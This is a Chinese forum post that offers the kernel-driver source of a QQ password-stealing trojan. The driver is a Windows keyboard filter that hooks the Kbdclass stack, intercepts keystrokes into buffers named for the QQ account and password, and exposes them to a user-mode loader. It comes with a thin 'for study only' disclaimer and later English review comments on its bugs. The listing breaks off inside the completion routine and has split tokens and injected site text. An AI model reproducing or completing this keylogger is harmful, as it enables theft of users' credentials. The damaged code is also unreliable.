现在网上很多盗QQ的木马,发现都不管用得,顺便做了这只QQ木马,这里发布一部分核心的代码内核代码,用于记录QQ密码,此代码编译后可以在win2000到win7下正常运行,百分百能获取正确的QQ和密码, 用户太下面的代码,只能获取QQ和密码,不带邮件发送功能,和系统隐藏功能,主要是怕有些人哪去干坏事,所以我不发布完整版的代码, 以下驱动代码需要编译为 NTI0.SYS 文件放到 C:\\Windows\\system32\\目录下面,在编译后面的代码,为一个DLL,最自己在用C写一个控制台程序加载 编译后的DLL ,运行起打开QQ登录后,就会显示出QQ帐号和密码,本篇文章只供学习只用,请不要哪去做坏事,后果自负。
#include
#include
#include
/* Key-transition and scan-code constants used by the filter.
 * KEY_UP / KEY_DOWN name the two key transitions; the place where they are
 * compared against the keyboard data is in the completion routine, which is
 * cut off in this listing, so the exact flag test is not visible here.
 * LCONTROL and CAPS_LOCK are the PS/2 set-1 make codes of the left Ctrl and
 * Caps Lock keys, i.e. the same index space asciiTbl below is built on. */
#define KEY_UP 1
#define KEY_DOWN 0
#define LCONTROL ((USHORT)0x1D)
#define CAPS_LOCK ((USHORT)0x3A)
/*
 * Scan-code to ASCII lookup table. Each variant holds 84 entries, indexed
 * by PS/2 set-1 make code 0x00..0x53; the four variants, in order, cover
 * no modifier, Caps Lock, Shift, and Caps Lock + Shift. A 0x00 entry means
 * the key has no printable ASCII value (modifiers, function keys, arrows);
 * 0x1B is Escape, 0x08 Backspace, 0x09 Tab, 0x0D Enter, 0x20 Space.
 * asciiTbl is not referenced anywhere in the visible part of this listing;
 * presumably the (truncated) completion routine does the lookup.
 *
 * NOTE(review): in this copy the last 0x31 of the fourth variant is split
 * across two lines ("0x3" / "1,") -- transcription damage, not an extra
 * entry.
 */
unsigned char asciiTbl[]={
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, // no modifier
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x5B, 0x5D, 0x0D, 0x00, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x7A, 0x78, 0x63, 0x76,
0x62, 0x6E, 0x6D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x30, 0x2D, 0x3D, 0x08, 0x09, // Caps Lock
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x5B, 0x5D, 0x0D, 0x00, 0x41, 0x53,
0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3B, 0x27, 0x60, 0x00, 0x5C, 0x5A, 0x58, 0x43, 0x56,
0x42, 0x4E, 0x4D, 0x2C, 0x2E, 0x2F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, // Shift
0x51, 0x57, 0x45, 0x52, 0x54, 0x59, 0x55, 0x49, 0x4F, 0x50, 0x7B, 0x7D, 0x0D, 0x00, 0x41, 0x53,
0x44, 0x46, 0x47, 0x48, 0x4A, 0x4B, 0x4C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x5A, 0x58, 0x43, 0x56,
0x42, 0x4E, 0x4D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x31,
0x32, 0x33, 0x30, 0x2E,
0x00, 0x1B, 0x21, 0x40, 0x23, 0x24, 0x25, 0x5E, 0x26, 0x2A, 0x28, 0x29, 0x5F, 0x2B, 0x08, 0x09, // Caps Lock + Shift
0x71, 0x77, 0x65, 0x72, 0x74, 0x79, 0x75, 0x69, 0x6F, 0x70, 0x7B, 0x7D, 0x0D, 0x00, 0x61, 0x73,
0x64, 0x66, 0x67, 0x68, 0x6A, 0x6B, 0x6C, 0x3A, 0x22, 0x7E, 0x00, 0x7C, 0x7A, 0x78, 0x63, 0x76,
0x62, 0x6E, 0x6D, 0x3C, 0x3E, 0x3F, 0x00, 0x2A, 0x00, 0x20, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x37, 0x38, 0x39, 0x2D, 0x34, 0x35, 0x36, 0x2B, 0x3
1,
0x32, 0x33, 0x30, 0x2E
};
/* Capture state shared by the dispatch routines and the (truncated)
 * completion routine. All of it is plain global data with no locking; the
 * spin lock in FILTER_DEVICE_EXTEN is initialised but never acquired
 * anywhere in this listing. */
CHAR s_QQPassword[100]={0x00}; /* per its name, the captured password; the only visible use is the clearing loop in AllIrpOther */
CHAR s_QQUser[100]={0x00};     /* per its name, the captured account name; no use visible in this listing */
CHAR s_TempC=0x00;             /* scratch character; no use visible in this listing */
ULONG s_QQCount=0;             /* reset to 0 by AllIrpOther, which also borrows it as the loop counter while wiping s_QQPassword */
ULONG s_QQStatus=0;            /* capture state value; reset to 0 by AllIrpOther, its other transitions are not in view */
ULONG s_DownCount=0;           /* no use visible in this listing */
ULONG s_UpChar=0;              /* no use visible in this listing */
/*
 * Device extension of each filter device object. AttachDeviceObject
 * creates one filter device per \Driver\Kbdclass device object and fills
 * this in; the dispatch routines read LowDeviceObject from it to forward
 * IRPs.
 */
typedef struct _FILTER_DEVICE_EXTEN
{
PDEVICE_OBJECT pFilterDeviceObject;// the filter device object itself
PDEVICE_OBJECT pTagerDeviceObject;// the Kbdclass device object this filter was attached to ("Tager" is the original spelling of "Target")
KSPIN_LOCK Lockspin;// meant as a call-time protection lock; initialised in AttachDeviceObject, never acquired in this listing
KEVENT ProcessEvent;// meant for inter-process synchronisation; initialised, never waited on or signalled in this listing
PDEVICE_OBJECT LowDeviceObject;// return value of IoAttachDeviceToDeviceStack: the next lower device that IRPs are forwarded to
}FILTER_DEVICE_EXTEN,*PFILTER_DEVICE_EXTEN;
/*
 * Undocumented ntoskrnl export, declared locally because no public header
 * provides it. AttachDeviceObject uses it to resolve "\Driver\Kbdclass"
 * to its DRIVER_OBJECT and walk that driver's device list, i.e. to attach
 * to the keyboard class devices without participating in PnP. This is the
 * attach pattern of the well-known Ctrl2Cap keyboard filter sample, which
 * the "c2p" identifiers in this file suggest it was derived from.
 */
NTSTATUS
ObReferenceObjectByName(
PUNICODE_STRING ObjectName,
ULONG Attributes,
PACCESS_STATE AccessState,
ACCESS_MASK DesiredAccess,
POBJECT_TYPE ObjectType,
KPROCESSOR_MODE AccessMode,
PVOID ParseContext,
PVOID *Object
);
/* Object type passed to ObReferenceObjectByName to request a driver object. */
extern POBJECT_TYPE IoDriverObjectType;
/* Count of read IRPs that have been forwarded with our completion routine
 * and not yet completed. Incremented in FilterReadIrp, polled to zero by
 * FilterUnload. The matching decrement is not in the visible part of this
 * listing (presumably in the truncated completion routine). Plain global,
 * no synchronisation. */
ULONG gC2pKeyCount = 0;
/* Forward declarations of the dispatch and helper routines defined below. */
VOID FilterUnload(IN PDRIVER_OBJECT pDriverObject);
VOID c2pDetach(IN PDEVICE_OBJECT pDeviceObject);
NTSTATUS AllIrpOther(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);
NTSTATUS FilterPower(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);// IRP_MJ_POWER has to be forwarded with PoCallDriver after PoStartNextPowerIrp
NTSTATUS FilterPnp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);// IRP_MJ_PNP needs its own dispatch routine (handles device removal)
NTSTATUS AttachDeviceObject(PDRIVER_OBJECT pDriverObject);
NTSTATUS FilterReadIrp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);// read irp
/* NOTE(review): the next prototype is split mid-token in this copy
 * ("IN P" / "VOID Context") -- transcription damage; the definition
 * further down reads "IN PVOID Context". */
NTSTATUS FilterCompletionRoutine(IN PDEVICE_OBJECT pCRDeviceObject,IN PIRP pCRIrp,IN P
VOID Context);
/* IOCTL handler and create/close handler. Both are installed by
 * DriverEntry, but neither body is part of this listing, so what the
 * IOCTL path returns to user mode, and whether it checks the caller, is
 * not visible here. */
NTSTATUS QQPassowrdControl(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);
NTSTATUS FilterCreateClose(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp);
/* Declared but not defined or called anywhere in the visible listing. */
void __stdcall print_keystroke(UCHAR sch);
/*
 * Driver entry point.
 *
 * Installs AllIrpOther (plain pass-through) for every IRP major code, then
 * overrides the ones the filter cares about: create/close, power, PnP,
 * read (where keystrokes are observed through a completion routine) and
 * device control (the IOCTL path the original author describes as the way
 * the user-mode side fetches the captured QQ password; QQPassowrdControl's
 * body is not in this listing). Finally attaches to every \Driver\Kbdclass
 * device object via AttachDeviceObject and returns its status.
 *
 * puServiceRegPath is not used.
 *
 * NOTE(review): as transcribed, the initialisation loop does not compile:
 * the increment is written "I++" (upper case, undeclared) and the store
 * targets the MajorFunction array itself rather than MajorFunction[i].
 * Both look like copy/paste damage rather than intent, since the
 * overrides right below use the indexed form.
 */
NTSTATUS DriverEntry(IN PDRIVER_OBJECT pDriverObject,IN PUNICODE_STRING puServiceRegPath)
{
int i;
for (i=0;i<IRP_MJ_MAXIMUM_FUNCTION+1;I++)
{
pDriverObject->MajorFunction=AllIrpOther;
}
pDriverObject->DriverUnload=FilterUnload;// unload routine
pDriverObject->MajorFunction[IRP_MJ_CREATE]=FilterCreateClose;
pDriverObject->MajorFunction[IRP_MJ_CLOSE]=FilterCreateClose;
pDriverObject->MajorFunction[IRP_MJ_POWER]=FilterPower;
pDriverObject->MajorFunction[IRP_MJ_PNP]=FilterPnp;
pDriverObject->MajorFunction[IRP_MJ_READ]=FilterReadIrp;
// device-control (IOCTL) handler; per the original comment this is how the
// captured QQ password is read out of the driver
pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]=QQPassowrdControl;
//KdPrint(("DriverEntry\n"));
return AttachDeviceObject(pDriverObject);
}
/************************************************************************/
/* Every other IRP is simply forwarded to the next lower driver with IoCallDriver */
/************************************************************************/
/*
 * Catch-all dispatch routine for every IRP major code that DriverEntry does
 * not override (i.e. anything other than create, close, power, PnP, read
 * and device control). It forwards the IRP down the keyboard stack
 * unchanged (skip current stack location + IoCallDriver) and then resets
 * the global capture state: the password buffer is wiped and s_QQStatus /
 * s_QQCount return to 0. So any such request reaching the filter restarts
 * the capture from scratch.
 *
 * Returns whatever the lower driver returned.
 *
 * NOTE(review): the wipe loop starts with s_QQCount = 100 and uses
 * s_QQCount-- as the index, so its first store is s_QQPassword[100] -- one
 * byte past the end of the 100-byte array -- and its last store is index
 * 1; index 0 is never cleared.
 *
 * NOTE(review), transcription damage in this copy: the text "qq签名发布"
 * glued to the front of the pFilterExten declaration is injected site
 * text, not code; the commented-out DbgPrint is split over two lines, so
 * its second half sits outside the comment; `i` is unused.
 */
NTSTATUS AllIrpOther(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
NTSTATUS status;
qq签名发布PFILTER_DEVICE_EXTEN pFilterExten;
ULONG i;
//KdPrint(("Other IRP!\n"));
pFilterExten=(PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
// pass the request straight through to the lower device
IoSkipCurrentIrpStackLocation(pIrp);
status=IoCallDriver(pFilterExten->LowDeviceObject,pIrp);
//DbgPrint("Other5
IoCallDriver: %x \n",status);
// reset capture state (see the out-of-bounds note above)
s_QQCount=100;
while(s_QQCount>0)
{
s_QQPassword[s_QQCount--]=0x00;
}
s_QQStatus=0;
s_QQCount=0;
return status;
}
/************************************************************************/
/* Create the filter devices, attach them to the keyboard devices and record the device pointers in the device extension */
/************************************************************************/
/*
 * Creates one filter device per \Driver\Kbdclass device object and attaches
 * it on top of that device's stack, so every read sent to a keyboard class
 * device passes through FilterReadIrp.
 *
 * Steps:
 *  1. Resolve "\Driver\Kbdclass" to its driver object with the undocumented
 *     ObReferenceObjectByName / IoDriverObjectType.
 *  2. Walk KbdDriverObject->DeviceObject via NextDevice. For each device:
 *     IoCreateDevice a *named* filter device (name taken from
 *     ntUnicodString[ntCount]), IoAttachDeviceToDeviceStack it, record the
 *     filter / target / lower device pointers in the extension, and copy
 *     DeviceType, Characteristics, StackSize(+1) and the
 *     DO_BUFFERED_IO / DO_DIRECT_IO / DO_POWER_PAGABLE flags from the lower
 *     device.
 *  3. Create the \DosDevices\KernelKeyboardAccess symbolic links so a
 *     user-mode program can open the filter devices and issue the device
 *     control requests handled by QQPassowrdControl (not in this listing).
 *
 * Returns STATUS_SUCCESS, or the first failing status from the object
 * lookup, IoCreateDevice or IoCreateSymbolicLink.
 *
 * Defender's note: keyboard filter devices are normally unnamed. The named
 * devices (\Driver\keyboard1..3 -- an unusual directory for a device name),
 * the KernelKeyboardAccess symbolic links, and an extra device object
 * attached above each Kbdclass device are stable, observable artifacts of
 * this driver.
 *
 * NOTE(review), defects visible in this listing:
 *  - ntUnicodString[1] and dosUnicodString[1] are each initialised twice
 *    (with the "2" string and then the "3" string) and element [2] never
 *    is. Consequences: the second filter device is named \Driver\keyboard3,
 *    KernelKeyboardAccess2 is never created (the second link maps
 *    KernelKeyboardAccess3 to \Driver\keyboard3), and with three or more
 *    Kbdclass devices IoCreateDevice is handed an uninitialised
 *    UNICODE_STRING; with more than three it indexes past the 3-element
 *    arrays.
 *  - On success the code calls ObDereferenceObject(pDriverObject) -- its
 *    own driver object -- instead of KbdDriverObject, the object whose
 *    reference ObReferenceObjectByName just took. That leaks a reference on
 *    Kbdclass and releases one this driver never owned.
 *  - If IoAttachDeviceToDeviceStack returns NULL the function returns
 *    `status`, which still holds the success code from IoCreateDevice, and
 *    the just-created filter device is neither deleted nor attached.
 *  - IoCreateDevice is given pTargetDevice->Type (the object-type field)
 *    where a DEVICE_TYPE is expected; the later
 *    pFilterDevice->DeviceType = pLowDevice->DeviceType assignment masks it.
 *  - Two commented-out KdPrint lines are split across two lines in this
 *    copy ("/" + "/KdPrint(...)" and "//K" + "dPrint(...)"), leaving stray
 *    tokens outside the comment.
 */
NTSTATUS AttachDeviceObject(PDRIVER_OBJECT pDriverObject)
{
NTSTATUS status;
UNICODE_STRING uKbdKeyName;
PFILTER_DEVICE_EXTEN pFilterExten;
PDEVICE_OBJECT pTargetDevice=NULL;
PDEVICE_OBJECT pLowDevice=NULL;
PDEVICE_OBJECT pFilterDevice=NULL;
PDRIVER_OBJECT KbdDriverObject = NULL;
UNICODE_STRING ntUnicodString[3];
UNICODE_STRING dosUnicodString[3];
ULONG ntCount=0;
// device names for the filter devices and their user-visible symbolic links
// (see the double-initialisation note above)
RtlInitUnicodeString(&ntUnicodString[0],L"\\Driver\\keyboard1");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard2");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard3");
RtlInitUnicodeString(&dosUnicodString[0],L"\\DosDevices\\KernelKeyboardAccess1");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess2");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess3");
RtlInitUnicodeString(&uKbdKeyName, L"\\Driver\\Kbdclass");
// look up the keyboard class driver object by name
status = ObReferenceObjectByName (
&uKbdKeyName,
OBJ_CASE_INSENSITIVE,
NULL,
0,
IoDriverObjectType,
KernelMode,
NULL,
&KbdDriverObject
);
if(!NT_SUCCESS(status))
{
KdPrint(("不到\\Driver\\Kbdclass驱动对象。\n"));
return( status );
}
else
{
// NOTE(review): wrong object -- see header
ObDereferenceObject(pDriverObject);
}
// attach a filter device above every device object Kbdclass owns
pTargetDevice=KbdDriverObject->DeviceObject;
while (pTargetDevice)
{
status=IoCreateDevice(pDriverObject,
sizeof(FILTER_DEVICE_EXTEN),
&ntUnicodString[ntCount],
pTargetDevice->Type,
pTargetDevice->Characteristics,
FALSE,
&pFilterDevice);
//DbgPrint("IoCreateDevice: %x \n",status);
if (!NT_SUCCESS(status))
{
/
/KdPrint(("Create Device Error!\n"));
return status;
}
pLowDevice=IoAttachDeviceToDeviceStack(pFilterDevice,pTargetDevice);
if (!pLowDevice)
{
//KdPrint(("Attach Device No Success!\n"));
// NOTE(review): returns the success status from IoCreateDevice and leaks pFilterDevice
return status;
}
pFilterExten=(PFILTER_DEVICE_EXTEN)pFilterDevice->DeviceExtension;
RtlZeroMemory(pFilterExten,sizeof(FILTER_DEVICE_EXTEN));//zero memory
pFilterExten->pFilterDeviceObject=pFilterDevice;
pFilterExten->pTagerDeviceObject=pTargetDevice;
pFilterExten->LowDeviceObject=pLowDevice;
KeInitializeSpinLock(&(pFilterExten->Lockspin));
KeInitializeEvent(&(pFilterExten->ProcessEvent), NotificationEvent, FALSE);
//KdPrint(("创建!\n"));
// mirror the lower device so requests are shaped the way Kbdclass expects
pFilterDevice->DeviceType=pLowDevice->DeviceType;
pFilterDevice->Characteristics=pLowDevice->Characteristics;
pFilterDevice->StackSize=pLowDevice->StackSize+1;
pFilterDevice->Flags |= pLowDevice->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE) ;
//next device
pTargetDevice =pTargetDevice->NextDevice;
ntCount++;
}
// user-mode access path to the filter devices
status=IoCreateSymbolicLink(&dosUnicodString[0],&ntUnicodString[0]);
if (!NT_SUCCESS(status))
{
//K
dPrint(("Create IoCreateSymbolicLink1 Error!\n"));
return status;
}
status=IoCreateSymbolicLink(&dosUnicodString[1],&ntUnicodString[1]);
if (!NT_SUCCESS(status))
{
//KdPrint(("Create IoCreateSymbolicLink2 Error!\n"));
return status;
}
return status;
}
/************************************************************************/
/* IRP_MJ_POWER */
/************************************************************************/
/*
 * IRP_MJ_POWER pass-through. Signals readiness for the next power IRP
 * (PoStartNextPowerIrp), skips our stack location and hands the IRP to the
 * lower device with PoCallDriver -- the call power IRPs require instead of
 * IoCallDriver. Nothing is inspected or changed.
 *
 * Returns the status from PoCallDriver.
 */
NTSTATUS FilterPower(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
PFILTER_DEVICE_EXTEN pFilterExten;
pFilterExten =(PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
PoStartNextPowerIrp( pIrp );
IoSkipCurrentIrpStackLocation( pIrp );
return PoCallDriver(pFilterExten->LowDeviceObject, pIrp );
}
/************************************************************************/
/* IRP_MJ_PNP */
/************************************************************************/
/*
 * IRP_MJ_PNP dispatch.
 *
 * IRP_MN_REMOVE_DEVICE: forward the request to the lower device first,
 * then detach from the stack and delete this filter device; always reports
 * STATUS_SUCCESS for this case (the lower driver's status is discarded).
 * Every other minor code is forwarded unchanged and its status returned.
 *
 * Note the detach target here is LowDeviceObject (the
 * IoAttachDeviceToDeviceStack result), whereas c2pDetach uses
 * pTagerDeviceObject (the Kbdclass device). They are the same object only
 * when nothing sat above Kbdclass before this filter attached.
 *
 * NOTE(review): the "first forward the request" comment is split across
 * two lines in this copy ("/" + "/ ..."), leaving a stray "/" token.
 */
NTSTATUS FilterPnp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
PFILTER_DEVICE_EXTEN pFilterExten;
PIO_STACK_LOCATION irpStack;
NTSTATUS status = STATUS_SUCCESS;
// fetch the extension to reach the lower (real) device
pFilterExten = (PFILTER_DEVICE_EXTEN)(pDeviceObject->DeviceExtension);
irpStack = IoGetCurrentIrpStackLocation(pIrp);
switch (irpStack->MinorFunction)
{
case IRP_MN_REMOVE_DEVICE:
//KdPrint(("IRP_MN_REMOVE_DEVICE\n"));
// first forward the request down the stack (original comment below is split in this copy)
/
/ 首先把请求发下去
IoSkipCurrentIrpStackLocation(pIrp);
IoCallDriver(pFilterExten->LowDeviceObject, pIrp);
// then detach from the target stack
IoDetachDevice(pFilterExten->LowDeviceObject);
// and delete the filter device we created
IoDeleteDevice(pDeviceObject);
status = STATUS_SUCCESS;
break;
default:
// every other PnP minor code is simply forwarded
IoSkipCurrentIrpStackLocation(pIrp);
status = IoCallDriver(pFilterExten->LowDeviceObject, pIrp);
}
return status;
}
/************************************************************************/
/* UnLoad */
/************************************************************************/
/*
 * DriverUnload: tears down what AttachDeviceObject set up. Deletes the two
 * symbolic links, walks the driver's device list detaching and deleting
 * each filter device through c2pDetach, then waits in 100 ms relative
 * delays (-1000000 in 100 ns units) until gC2pKeyCount drops to zero, i.e.
 * until no forwarded read IRP carrying our completion routine is pending.
 *
 * NOTE(review), defects visible in this listing:
 *  - The device loop calls c2pDetach(DeviceObject) -- which passes the
 *    object to IoDeleteDevice -- and then reads DeviceObject->NextDevice
 *    from that same, now deleted, object. The unused OldDeviceObject local
 *    suggests the intended order was: remember the pointer, advance, then
 *    detach the remembered one.
 *  - gC2pKeyCount is only ever incremented in the visible code
 *    (FilterReadIrp). If the decrement is not in the truncated completion
 *    routine, the final wait loop never exits.
 *  - KeSetPriorityThread(..., LOW_REALTIME_PRIORITY): despite the name this
 *    is the lowest *real-time* level, above every normal-priority thread,
 *    so the original rationale ("disturb other programs as little as
 *    possible") describes the opposite of the effect.
 *  - UNREFERENCED_PARAMETER(pDriverObject) (split over two lines in this
 *    copy) is misleading: pDriverObject is used right below.
 *  - ntUnicodString is initialised but never used here, and it repeats the
 *    double initialisation of element [1] seen in AttachDeviceObject.
 *  - pFilterExten is unused.
 */
VOID FilterUnload(IN PDRIVER_OBJECT pDriverObject)
{
PDEVICE_OBJECT DeviceObject;
PDEVICE_OBJECT OldDeviceObject;
PFILTER_DEVICE_EXTEN pFilterExten;
LARGE_INTEGER lDelay;
PKTHREAD CurrentThread;
UNICODE_STRING ntUnicodString[3];
UNICODE_STRING dosUnicodString[3];
RtlInitUnicodeString(&ntUnicodString[0],L"\\Driver\\keyboard1");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard2");
RtlInitUnicodeString(&ntUnicodString[1],L"\\Driver\\keyboard3");
RtlInitUnicodeString(&dosUnicodString[0],L"\\DosDevices\\KernelKeyboardAccess1");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess2");
RtlInitUnicodeString(&dosUnicodString[1],L"\\DosDevices\\KernelKeyboardAccess3");
//delay some time
lDelay = RtlConvertLongToLargeInteger(-1000000);
CurrentThread = KeGetCurrentThread();
// original rationale: set the current thread to "low real-time" so it disturbs
// other programs as little as possible (see the note in the header)
KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY);
UNREFERE
NCED_PARAMETER(pDriverObject);
//KdPrint(("\n"));
IoDeleteSymbolicLink(&dosUnicodString[0]);
IoDeleteSymbolicLink(&dosUnicodString[1]);
// walk all our devices and detach every one of them (original comment below is split in this copy)
/
/ 遍历所有设备并一律解除绑定
DeviceObject = pDriverObject->DeviceObject;
while (DeviceObject)
{
// detach and delete this device (NextDevice is then read from the deleted object -- see header)
c2pDetach(DeviceObject);
DeviceObject = DeviceObject->NextDevice;
}
ASSERT(NULL ==pDriverObject->DeviceObject);
// wait for outstanding forwarded reads to drain
while (gC2pKeyCount)
{
KeDelayExecutionThread(KernelMode, FALSE, &lDelay);
}
//KdPrint(("DriverEntry unLoad OK!\n"));
return;
}
/*
 * Detach one filter device from the keyboard stack and delete it. Called
 * by FilterUnload for each device on the driver's device list.
 *
 * The detach target is pTagerDeviceObject (the Kbdclass device recorded at
 * attach time); FilterPnp instead detaches using LowDeviceObject. The two
 * coincide only if nothing was attached above Kbdclass before this filter.
 *
 * NOTE(review): after IoDeleteDevice(pDeviceObject) the code stores
 * pFilterExten->pFilterDeviceObject = NULL through the extension of the
 * device it just deleted. The __try/__except wrapper should not be relied
 * on to cover that: in general kernel-mode SEH does not catch faults on
 * invalid kernel addresses. NoRequestsOutstanding is unused.
 */
VOID
c2pDetach(IN PDEVICE_OBJECT pDeviceObject)
{
PFILTER_DEVICE_EXTEN pFilterExten;
BOOLEAN NoRequestsOutstanding = FALSE;
pFilterExten = (PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
__try
{
__try
{
IoDetachDevice(pFilterExten->pTagerDeviceObject);
pFilterExten->pTagerDeviceObject = NULL;
IoDeleteDevice(pDeviceObject);
// NOTE(review): write into the extension of the device deleted on the previous line
pFilterExten->pFilterDeviceObject = NULL;
//DbgPrint(("Detach Finished\n"));
}
__except (EXCEPTION_EXECUTE_HANDLER){}
}
__finally{}
return;
}
/************************************************************************/
/* read irp */
/************************************************************************/
/*
 * IRP_MJ_READ dispatch -- the point where keyboard input is intercepted.
 *
 * Reads are not answered here; the IRP is forwarded to the lower keyboard
 * device with FilterCompletionRoutine installed (invoked on success, error
 * and cancel, with our device object as context). When Kbdclass completes
 * the read, the completion routine sees the returned buffer (its body is
 * cut off in this listing; it starts by taking AssociatedIrp.SystemBuffer).
 *
 * If pIrp->CurrentLocation == 1 there is no stack location left for the
 * lower driver, so the IRP is completed with STATUS_INVALID_DEVICE_REQUEST.
 * Otherwise gC2pKeyCount is bumped (FilterUnload waits for it to return to
 * zero) and the IoCallDriver status is returned.
 *
 * NOTE(review): gC2pKeyCount++ on a plain global with no lock or
 * interlocked operation; waitEvent is initialised but never used; the
 * commented-out currentIrpStack declaration is split across two lines in
 * this copy, leaving a stray "/" token.
 */
NTSTATUS FilterReadIrp(IN PDEVICE_OBJECT pDeviceObject,IN PIRP pIrp)
{
NTSTATUS status;
PFILTER_DEVICE_EXTEN pFilterExten;
/
/PIO_STACK_LOCATION currentIrpStack;
KEVENT waitEvent;
status= STATUS_SUCCESS;
KeInitializeEvent( &waitEvent, NotificationEvent, FALSE );
// no remaining stack location for the lower driver: fail the request
if (pIrp->CurrentLocation == 1)
{
//KdPrint(("Dispatch encountered bogus current location\n"));
status = STATUS_INVALID_DEVICE_REQUEST;
pIrp->IoStatus.Status = status;
pIrp->IoStatus.Information = 0;
IoCompleteRequest(pIrp, IO_NO_INCREMENT);
return(status);
}
// bump the global outstanding-read counter
gC2pKeyCount++;
// get the device extension; we need the lower device pointer from it
pFilterExten=(PFILTER_DEVICE_EXTEN)pDeviceObject->DeviceExtension;
// install the completion routine and pass the IRP down; from the dispatch
// routine's point of view the read is then done -- what remains is waiting
// for the lower driver to complete it
//currentIrpStack = IoGetCurrentIrpStackLocation(pIrp);
IoCopyCurrentIrpStackLocationToNext(pIrp);
IoSetCompletionRoutine( pIrp, FilterCompletionRoutine,
pDeviceObject, TRUE, TRUE, TRUE );
return IoCallDriver( pFilterExten->LowDeviceObject, pIrp );
}
// Modifier-state flags used to pick the asciiTbl variant when decoding
// scan codes. Written and read only by the completion routine, which is
// cut off in this listing, so no use is visible here. Plain statics shared
// by completion callbacks, with no synchronisation.
static int s_shift2=0;
static int s_caps2=0;
static int s_num=0;
NTSTATUS FilterCompletionRoutine(IN PDEVICE_OBJECT pCRDeviceObject,IN PIRP pCRIrp,IN PVOID Context)
{
PIO_STACK_LOCATION IrpSp;
ULONG buf_len;
PUCHAR buf;
size_t i;
buf = NULL;
buf_len = 0;
IrpSp = IoGetCurrentIrpStackLocation( pCRIrp );
// 如果这个请求是成功的。很显然,如果请求失败了,这么获取
// 进一步的信息是没意义的。
if( NT_SUCCESS( pCRIrp->IoStatus.Status ) )
{
// 获得读请求完成后输出的缓冲区
buf = pCRIrp->AssociatedIrp.SystemBuffer;
/
/ 获得这个缓冲区